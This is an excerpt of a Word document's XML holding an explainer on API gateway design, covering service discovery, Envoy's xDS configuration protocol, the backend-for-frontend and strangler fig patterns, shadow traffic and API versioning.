    <w:p w14:paraId="7C3A50CB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A79D9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Gateway ← (watch/subscription) → Consul/etcd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32616EA5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">         "payment-service endpoint 10.0.1.7 is now unhealthy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE9099" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">         "payment-service new endpoint 10.0.1.8 registered"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5E2390" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Push-based updates (event subscription) are faster than poll-based DNS — changes propagate in milliseconds rather than waiting for the next DNS TTL expiry or periodic re-resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058706F6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kubernetes Endpoints API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822AEF6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>In Kubernetes, the gateway watches the Endpoints API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559ED18F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA2BA6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>kubectl get endpoints payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C94AD4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>NAME              ENDPOINTS                          AGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948AAD0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>payment-service   10.0.1.5:8080,10.0.1.6:8080,     1h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDDAE3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">                  10.0.1.7:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52EA77" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The Endpoints resource is updated by Kubernetes when pods start, stop, or fail health checks. The gateway's controller watches this resource and updates its routing tables in real time — pod failures are reflected in the gateway's routing within seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9B352" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xDS — The Dynamic Configuration Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54610D55" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xDS (eXtensible Discovery Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> is the protocol Envoy and other gateways use to receive dynamic configuration from a control plane. It is a set of gRPC streaming APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4946BA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="857"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EDS (Endpoint Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Which instances (IP:port) are available for each cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582B2709" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="857"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDS (Cluster Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Which backend clusters exist and their configuration (load balancing policy, health check parameters, circuit breaker settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A855977" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="857"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDS (Route Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Which routes map to which clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5F1DD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="857"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LDS (Listener Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> What ports to listen on and how to handle connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC77A4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="857"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SDS (Secret Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> TLS certificates and private keys, dynamically rotated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E68593" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The streaming update model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F3EAE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>long-lived bidirectional gRPC stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> to the control plane. Configuration updates are pushed as they change — the gateway applies them immediately without restart. This enables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163470BB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="858"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Rolling deployments: routes updated gradually (5% traffic to new version → 25% → 50% → 100%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D56F67" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="858"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Instant circuit breaking: a failing service is removed from all gateway instances' routing within seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FA879" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="858"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Zero-downtime certificate rotation: new TLS certificates pushed to all gateways before the old ones expire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488EECB8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ACK/NACK protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C229D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>After receiving a configuration update, the gateway responds with ACK (applied successfully) or NACK (failed to apply — configuration error). The control plane can track which gateways are on which configuration version and detect misconfiguration before it affects production traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868BDBA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="17319B45">
          <v:rect id="_x0000_i3830" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35433022" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. API Gateway Patterns — Design Choices and Trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A5E97" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Backend for Frontend (BFF) Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562BC9AE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Different clients (mobile apps, web browsers, third-party integrations) have different API needs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E4F7BE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="859"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>Mobile apps need small, bandwidth-efficient responses (limited by cellular data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33012491" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="859"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Web browsers need rich, feature-complete responses (high bandwidth, support for complex interactions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4A1C5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="859"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Third-party integrations need stable, versioned, well-documented APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571EED43" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>One API serving all clients requires compromises — mobile gets data it doesn't need (wasting bandwidth), web gets data that's too simplified. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BFF pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> creates separate API gateways (or gateway configurations) per client type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881165B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4373ED" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Mobile App    → Mobile BFF Gateway → [User Service, Order Service, Product Service]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C34742" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Web Browser   → Web BFF Gateway    → [Same backend services]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9161B3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Partner API   → Partner BFF        → [Same backend services]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075E0F1C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Each BFF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E765B0C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Aggregates backend calls for its client's typical request patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FA5D6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Transforms responses into client-optimized formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9F1B5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Implements client-appropriate authentication (OAuth for partners, session cookies for web, API keys for mobile).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461AAD55" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Enforces client-specific rate limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08786408" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The BFF gateway is not a separate codebase per client</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — it's a configuration difference on the same gateway, or a thin application layer that calls the same backend services but with client-specific orchestration logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA24BB2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Strangler Fig Pattern via Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E9567" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Legacy monolith migration using the API gateway as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>traffic router</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F64A90" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08974E5B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Phase 1 (all traffic to monolith):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA5BCF2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  /api/* → Monolith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044E591F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="4CBDBF7F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Phase 2 (gradually migrate endpoints):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26683EAF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  /api/payments/* → New Payment Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0839875C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  /api/users/*    → New User Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A8859" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  /api/*          → Monolith (remaining endpoints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D9374" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="4EAE89CE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Phase 3 (monolith decommissioned):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E97450" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  /api/* → Various Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1FD7AF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway routes traffic to the appropriate system — new microservice or legacy monolith — based on which endpoints have been migrated. The client never changes its API calls. The migration is entirely invisible to API consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A23E60" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shadow traffic (dark launch) via gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523FAEA2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>During migration, the gateway can </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>duplicate traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — send requests to both the legacy monolith and the new microservice, compare responses, and serve the monolith's response to clients:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B5ACF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477AEDC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Client request → Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C0AE8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">               ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB5014" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    ┌──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FBFB63" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    ↓                     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E7E2ED" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Monolith           New Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F96F65" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  (primary)          (shadow — response discarded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633529B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F4C0C7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Response → Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D945C2C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The new microservice receives real production traffic without any risk — its responses are logged for comparison but discarded. This validates the new service's correctness and performance under real load before switching clients to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0E192" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Versioning at the Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA72DB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL versioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48152D13" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F12DB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>/v1/payments → Payment Service v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13335D6A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>/v2/payments → Payment Service v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349356BE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Clean, explicit, but pollutes URLs. Clients must update base URLs when upgrading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13738973" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Header versioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CACC2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C8038" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Accept: application/vnd.example.v2+json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FB3D7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-API-Version: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E33498" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Keeps URLs clean. Harder to test (can't just change the URL in a browser). Requires clients to manage headers.</w:t>
      </w:r>
    </w:p>
